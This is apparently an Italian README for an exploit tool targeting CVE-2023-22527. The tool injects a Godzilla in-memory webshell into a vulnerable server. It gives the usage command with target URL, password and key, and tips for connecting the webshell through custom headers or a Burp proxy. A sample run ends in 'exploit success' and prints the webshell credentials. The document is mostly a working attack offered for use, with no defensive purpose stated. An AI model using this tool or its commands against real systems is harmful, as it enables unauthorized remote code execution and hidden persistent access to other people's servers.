
CVE-2023-22527 strumento di iniezione di cavalli di memoria
ps: La versione testata è la 8.5.1, altre versioni funzionano sicuramente ma non sono state testate.
Il contenuto fa riferimento allo strumento precedente del Maestro Beichen.
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar url password_godzilla chiave_godzilla
example
java -jar CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://xxxx/ pass key
Se la shell in memoria è stata iniettata con successo ma Godzilla non riesce a connettersi, aggiungi le seguenti intestazioni nella configurazione della richiesta o configura un proxy Burp per Godzilla.
Connection: close
$ java -jar .\CVE-2023-22527-Godzilla-MEMSHELL-main.jar http://127.0.0.1:8090/ qaxnb key
[*] Exploit url: http://127.0.0.1:8090/template/aui/text-inline.vm
Response Code: 200
Response Code: 200
[*] send payload
Validate Response Code: 200
[*] exploit success
[*] godzilla webshell password : qaxnb
[*] godzilla webshell key : key
